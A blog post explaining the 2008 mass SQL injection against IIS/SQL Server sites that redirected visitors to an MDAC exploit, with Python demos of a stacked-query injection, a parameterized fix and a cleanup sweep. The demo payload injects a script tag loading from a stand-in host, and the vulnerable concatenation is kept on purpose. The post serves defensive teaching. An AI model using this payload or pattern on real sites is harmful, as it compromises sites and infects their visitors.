In what has to be one of the largest SQL injection attacks on record, Google search results last weekend showed script injections on over 70,000 domains. This time it wasn't Oracle shops that were hit; the compromised sites ran Microsoft SQL Server behind IIS. And here I was giving Oracle grief for not patching their bugs. To be fair, though, the sites weren't broken into through an unpatched Microsoft product: they were broken into through their own web applications, which passed untrusted input straight into SQL.
The attack ran in two stages. First, the attackers used SQL injection to write a script tag into the text fields of each site's database. Second, that script sent visitors' browsers to a server hosting an exploit for an MDAC vulnerability (MS06-014) that Microsoft had patched back in September 2006, so only visitors who had skipped that patch were infected. For those unfamiliar with SQL injection: the attacker puts SQL statements into a field the web application treats as plain data (a query-string parameter, a form field), and because the application concatenates that data into its SQL text, the database server executes the attacker's statements alongside, or instead of, the ones the developer wrote.
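To make the injection concrete, here is an added example (not code from the original post or from any of the affected sites) that simulates the vulnerable pattern in Python against an in-memory SQLite database, beside the parameterized version that defeats it. The schema, the product-lookup page and the host example.invalid in the script tag are all hypothetical; run_batch() mimics SQL Server's habit of executing every ';'-separated statement in a batch, which SQLite's execute() does not do on its own.

```python
import sqlite3

# Hypothetical stand-in host; the real attack pointed at a different domain.
SCRIPT_TAG = '<script src="http://example.invalid/x.js"></script>'

# Payload shaped like the stacked-query injection: a valid id, then ';' and a
# second statement that rewrites every row. ('||' is SQLite string
# concatenation; the SQL Server equivalent is '+'.)
PAYLOAD = f"1; UPDATE products SET description = description || '{SCRIPT_TAG}'"


def make_db():
    """Constructed sample data for a product-lookup page (not real site data)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name VARCHAR(100), description TEXT);
        INSERT INTO products VALUES (1, 'Widget', 'A plain widget');
        INSERT INTO products VALUES (2, 'Gadget', 'A plain gadget');
    """)
    return conn


def run_batch(conn, sql):
    """Emulate SQL Server batch execution: every ';'-separated statement runs.

    Returns the rows produced by the last statement (an UPDATE yields none).
    """
    rows = []
    for stmt in sql.split(";"):
        if stmt.strip():
            rows = conn.execute(stmt).fetchall()
    conn.commit()
    return rows


def lookup_vulnerable(conn, product_id):
    # Vulnerable: the request parameter is spliced into the SQL text, so
    # everything after a ';' in the input becomes a second statement.
    return run_batch(conn, "SELECT name FROM products WHERE id = " + product_id)


def lookup_safe(conn, product_id):
    # Hardened: the value is bound as a parameter and can only ever be data.
    # The payload string simply fails to match any id.
    return conn.execute("SELECT name FROM products WHERE id = ?", (product_id,)).fetchall()


def descriptions(conn):
    """All description cells in id order, to inspect the side effect."""
    return [row[0] for row in conn.execute("SELECT description FROM products ORDER BY id")]


if __name__ == "__main__":
    db = make_db()
    lookup_vulnerable(db, PAYLOAD)
    print(descriptions(db))          # every row now carries the script tag
    db = make_db()
    print(lookup_safe(db, PAYLOAD))  # [] and the data is untouched
    print(descriptions(db))
```

The fix is not input filtering but separating code from data: with a bound parameter, the database never parses the attacker's text as SQL, regardless of what it contains.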
Check out what CNET has to say in "Massive SQL-based Web attack decoded":
On Wednesday, the SANS Internet Storm Center and others published details about the massive SQL-based Web attack that occurred over the weekend. The attack, says SANS, is similar to a smaller SQL-injection attack seen last November. At least 70,000 sites were compromised in a short period of time, leading some to speculate this was an automated attack.
From log files, the attack code appears to exploit a variety of SQL injection vulnerabilities existing on Web sites using Microsoft SQL or Microsoft IIS. On the vulnerable sites, malicious JavaScript is injected into all varchar and text fields in the SQL database such that when a visitor hits the site, their browsers, if vulnerable, are then redirected to another domain, in this case uc8010.com.
Roger Thompson, chief research officer at Grisoft, identified one exploit served at the malicious server as taking advantage of MS06-014, an MDAC vulnerability that Microsoft patched in September 2006. He also noted that "this domain uc8010(dot)com was registered just a few days ago (Dec 28), and yet, at one point Google showed script injections pointing to it were showing up on over 70k domains." Yet by January 5, 2008, most of these domains had already been cleaned.
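As an added example (not from the CNET or SANS write-ups), here is a Python sweep over an SQLite database that does what an administrator of an affected site needed to do: enumerate every varchar/text column, the same set the attack's injected UPDATE walked, find cells carrying a script tag, record which host it points at, and strip it. The tables, rows and the host example.invalid are constructed for the example; on SQL Server the column enumeration would come from INFORMATION_SCHEMA.COLUMNS instead of sqlite_master and PRAGMA table_info.

```python
import re
import sqlite3

# Matches a whole injected <script ...>...</script> element, case-insensitively.
SCRIPT_RE = re.compile(r"<script\b[^>]*>.*?</script>", re.I | re.S)
# Pulls the host out of the src attribute, for an indicator list.
SRC_RE = re.compile(r"""src\s*=\s*["']?(?:https?:)?//([^/"'\s>]+)""", re.I)

TEXT_TYPES = ("VARCHAR", "NVARCHAR", "CHAR", "NCHAR", "TEXT", "NTEXT")


def sample_db():
    """Constructed database imitating a site after the injection (not real data).

    example.invalid stands in for the attacker's redirect host.
    """
    tag = '<script src="http://example.invalid/1.js"></script>'
    conn = sqlite3.connect(":memory:")
    conn.executescript(f"""
        CREATE TABLE products (id INTEGER PRIMARY KEY, name VARCHAR(100), description TEXT);
        CREATE TABLE news (id INTEGER PRIMARY KEY, title VARCHAR(200), body TEXT, views INTEGER);
        INSERT INTO products VALUES (1, 'Widget{tag}', 'A plain widget{tag}');
        INSERT INTO news VALUES (1, 'Release notes', 'Nothing to see here', 7);
        INSERT INTO news VALUES (2, 'Outage{tag}', 'Back online', 3);
    """)
    return conn


def text_columns(conn):
    """(table, column) pairs whose declared type holds text; the attack's target set."""
    cols = []
    tables = [r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table' AND name NOT LIKE 'sqlite_%'")]
    for table in tables:
        # Names come from the catalog, not from users, but are still quoted.
        for _cid, name, ctype, *_rest in conn.execute(f'PRAGMA table_info("{table}")'):
            if ctype.upper().startswith(TEXT_TYPES):
                cols.append((table, name))
    return cols


def _suspect_rows(conn, table, col):
    return conn.execute(
        f'SELECT rowid, "{col}" FROM "{table}" WHERE "{col}" LIKE ?', ("%<script%",)).fetchall()


def find_injected(conn):
    """Every (table, column, rowid, script_host) where a text cell carries a script tag."""
    hits = []
    for table, col in text_columns(conn):
        for rowid, value in _suspect_rows(conn, table, col):
            for tag in SCRIPT_RE.findall(value):
                m = SRC_RE.search(tag)
                hits.append((table, col, rowid, m.group(1) if m else None))
    return hits


def clean_injected(conn):
    """Strip injected script elements from every flagged cell; returns cells fixed."""
    fixed = 0
    for table, col in text_columns(conn):
        for rowid, value in _suspect_rows(conn, table, col):
            cleaned = SCRIPT_RE.sub("", value)
            if cleaned != value:
                conn.execute(f'UPDATE "{table}" SET "{col}" = ? WHERE rowid = ?',
                             (cleaned, rowid))
                fixed += 1
    conn.commit()
    return fixed


if __name__ == "__main__":
    db = sample_db()
    for hit in find_injected(db):
        print("injected:", hit)
    print("cleaned cells:", clean_injected(db))
    print("remaining:", find_injected(db))
```

Cleaning the data does not close the hole: the vulnerable page is still there and an automated attack will simply come back, so parameterize the injection point before or alongside the cleanup, and where a known-good backup exists, restoring it beats regex surgery on production rows.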